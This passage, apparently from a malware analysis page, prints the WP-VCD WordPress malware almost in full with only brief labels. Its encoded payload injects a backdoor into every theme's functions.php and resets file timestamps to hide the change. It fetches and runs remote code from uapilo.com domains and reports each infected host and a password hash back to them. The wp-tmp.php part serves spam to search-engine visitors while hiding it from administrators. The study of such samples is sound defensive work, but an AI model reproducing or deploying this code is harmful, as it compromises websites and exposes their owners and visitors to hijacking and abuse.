CAgICAKCiR3cF9hdXRoX2tleT0nMTEyMjI4NDhhMTBmMWQwZWE1NTViY2RmNzczZjNlYjQnOwogICAgICAgIGlmICgoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cudWFwaWxvLmNvbS9jb2RlLnBocCIpIE9SICR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzX3RjdXJsKCJodHRwOi8vd3d3LnVhcGlsby5jb20vY29kZS5waHAiKSkgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CgogICAgICAgICAgICBpZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRl
bnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgCiAgICAgICAgCiAgICAgICAgZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3d3dy51YXBpbG8ucHcvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgewoKaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsKICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIAogICAgICAgICAgICB9CiAgICAgICAgfSAKCQkKCQkgICAgICAgIGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cudWFwaWxvLnRvcC9jb2RlLnBocCIpICBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UgKSB7CgppZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAg
ICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CgkJZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7CiAgICAgICAgICAgCiAgICAgICAgfSBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICB9Cn0KCi8vJHN0YXJ0X3dwX3RoZW1lX3RtcAoKCgovL3dwX3RtcAoKCi8vJGVuZF93cF90aGVtZV90bXAKPz4='; $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT); $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code )); $themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes'; $ping = true; $ping2 = false; if ($list = scandir( $themes )) { foreach ($list as $_) { if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 
'functions.php')) { $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'); if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) { if (strpos($content, 'WP_V_CD') === false) { $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time ); } else { $ping = false; } } } else { $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_); foreach ($list2 as $_2) { if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) { $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'); if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) { if (strpos($content, 'WP_V_CD') === false) { $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time ); $ping2 = true; } else { //$ping2 = true; } } } } } } if ($ping) { $content = @file_get_contents('http://www.uapilo.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uapilo.com/admin.txt')); //echo ABSPATH . 'wp-includes/class.wp.php'; } if ($ping2) { $content = @file_get_contents('http://www.uapilo.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.uapilo.com/admin.txt')); //echo ABSPATH . 
'wp-includes/class.wp.php'; } } for ($i = 0; $i<MAX_LEVEL; $i++) { $dirs[realpath(P . str_repeat('/../', $i + 1))] = realpath(P . str_repeat('/../', $i + 1)); } foreach ($dirs as $dir) { foreach (@getDirList($dir) as $__) { @SearchFile($search, $__); } } foreach ($GLOBALS['DIR_ARRAY'] as $e) { //print_r($e); if ($file = file_get_contents($e[1])) { WP_URL_CD(dirname($e[1])); if (preg_match('|\'AUTH_SALT\'\s*\,\s*\'(.*?)\'|s', $file, $salt)) { if ($salt[1] != AUTH_SALT) { // WP_URL_CD(dirname($e[1])); //echo dirname($e[1]); } } } } if ($file = @file_get_contents(__FILE__)) { $file = preg_replace('!//install_code.*//install_code_end!s', '', $file); $file = preg_replace('!<\?php\s*\?>!s', '', $file); @file_put_contents(__FILE__, $file); } } //install_code_end ?><?php error_reporting(0);?>
Typical code found in wp-tmp.php:
ini_set('display_errors', 0);
error_reporting(0);
$wp_auth_key='11222848a10f1d0ea555bcdf773f3eb4';
if ( ! function_exists( 'slider_option' ) ) {
    function slider_option($content){
        if(is_single()) {
            $con = ' ';
            $con2 = ' < < ';
            $content=$content.$con2;
        }
        return $content;
    }
    function slider_option_footer(){
        if(!is_single()) {
            $con2 = ' < < ';
            echo $con2;
        }
    }
    function setting_my_first_cookie() {
        setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
    }
    if(is_user_logged_in()) {
        add_action( 'init', 'setting_my_first_cookie',1 );
    }
    if( current_user_can('edit_others_pages')) {
        if (file_exists(ABSPATH.'wp-includes/wp-feed.php')) {
            $ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
        }
        if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false) {
            $ip.=$_SERVER['REMOTE_ADDR'].' ';
            @file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);
        }
    }
    $ref = $_SERVER['HTTP_REFERER'];
    $SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
    foreach ($SE as $source) {
        if (strpos($ref,$source)!==false) {
            setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);
            $sevisitor=true;
        }
    }
    if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) {
        $adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
        if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false) {
            if($sevisitor==true || isset($_COOKIE['sevisitor'])) {
                add_filter('the_content','slider_option');
                add_action('wp_footer','slider_option_footer');
            }
        }
    }
}
Contents of a typical wp-vcd.php:
<?php error_reporting(0); ini_set('display_errors', 0); $install_code = 'PD9waHAKaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkKCXsKJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgoJCQkJCgoKCgoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQoJCQkJCQl7CgkJCQkJCQkKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpCgkJCQkJCQkJewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYocHJlZ19tYXRjaF9hbGwoJy9cJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHNcKCJodHRwOlwvXC8oLiopXC9jb2RlXC5waHAvaScsJGZpbGUsJG1hdGNob2xkZG9tYWluKSkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRmaWxlID0gcHJlZ19yZXBsYWNlKCcvJy4kbWF0Y2hvbGRkb21haW5bMV1bMF0uJy9pJywkX1JFUVVFU1RbJ25ld2RvbWFpbiddLCAkZmlsZSk7CgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOwoJCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludCAidHJ1ZSI7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgoKCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoKCQkJCQkJCQljYXNlICdjaGFuZ2VfY29kZSc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJewo
JCQkJCQkJCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJCQl7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpCgkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXHNcU10qKVwvXC9cJGVuZF93cF90aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CgoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsKCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKF9fRklMRV9fLCAkZmlsZSk7CgkJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ICJ0cnVlIjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCgoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWRlZmF1bHQ6IHByaW50ICJFUlJPUl9XUF9BQ1RJT04gV1BfVl9DRCBXUF9DRCI7CgkJCX0KCQkJCgkJZGllKCIiKTsKCX0KCgoKCgoKCgokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOwokZnVuY2ZpbGUgICAgICA9IF9fRklMRV9fOwppZighZnVuY3Rpb25fZXhpc3RzKCd0aGVtZV90ZW1wX3NldHVwJykpIHsKICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJF9TRVJWRVJbUkVRVUVTVF9VUkldOwogICAgaWYgKHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsKICAgICAgICAKICAgICAgICBmdW5jdGlvbiBmaWx
lX2dldF9jb250ZW50c190Y3VybCgkdXJsKQogICAgICAgIHsKICAgICAgICAgICAgJGNoID0gY3VybF9pbml0KCk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsKICAgICAgICAgICAgJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsKICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgICAgICByZXR1cm4gJGRhdGE7CiAgICAgICAgfQogICAgICAgIAogICAgICAgIGZ1bmN0aW9uIHRoZW1lX3RlbXBfc2V0dXAoJHBocENvZGUpCiAgICAgICAgewogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsKICAgICAgICAgICAgJGhhbmRsZSAgID0gZm9wZW4oJHRtcGZuYW1lLCAidysiKTsKICAgICAgICAgICBpZiggZndyaXRlKCRoYW5kbGUsICI8P3BocFxuIiAuICRwaHBDb2RlKSkKCQkgICB7CgkJICAgfQoJCQllbHNlCgkJCXsKCQkJJHRtcGZuYW1lID0gdGVtcG5hbSgnLi8nLCAidGhlbWVfdGVtcF9zZXR1cCIpOwogICAgICAgICAgICAkaGFuZGxlICAgPSBmb3BlbigkdG1wZm5hbWUsICJ3KyIpOwoJCQlmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOwoJCQl9CgkJCWZjbG9zZSgkaGFuZGxlKTsKICAgICAgICAgICAgaW5jbHVkZSAkdG1wZm5hbWU7CiAgICAgICAgICAgIHVubGluaygkdG1wZm5hbWUpOwogICAgICAgICAgICByZXR1cm4gZ2V0X2RlZmluZWRfdmFycygpOwogICAgICAgIH0KICAgICAgICAKCiR3cF9hdXRoX2tleT0nMTEyMjI4NDhhMTBmMWQwZWE1NTViY2RmNzczZjNlYjQnOwogICAgICAgIGlmICgoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cudWFwaWxvLmNvbS9jb2RlLnBocCIpIE9SICR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzX3RjdXJsKCJodHRwOi8vd3d3LnVhcGlsby5jb20vY29kZS5waHAiKSkgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CgogICAgICAgICAgICBpZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V
4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgCiAgICAgICAgCiAgICAgICAgZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3d3dy51YXBpbG8ucHcvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgewoKaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsKICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIAogICAgICAgICAgICB9CiAgICAgICAgfSAKCQkKCQkgICAgICAgIGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cudWFwaWxvLnRvcC9jb2RlLnBocCIpICBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UgKSB7CgppZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgIAogICAgICA
gICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgewogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgIH0KICAgICAgICB9CgkJZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7CiAgICAgICAgICAgCiAgICAgICAgfSBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgCgogICAgICAgIH0gCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICAgICAgCiAgICB9Cn0KCi8vJHN0YXJ0X3dwX3RoZW1lX3RtcAoKCgovL3dwX3RtcAoKCi8vJGVuZF93cF90aGVtZV90bXAKPz4='; $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT); $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code )); $themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes'; $ping = true; $ping2 = false; if ($list = scandir( $themes )) { foreach ($list as $_) { if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) { $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 
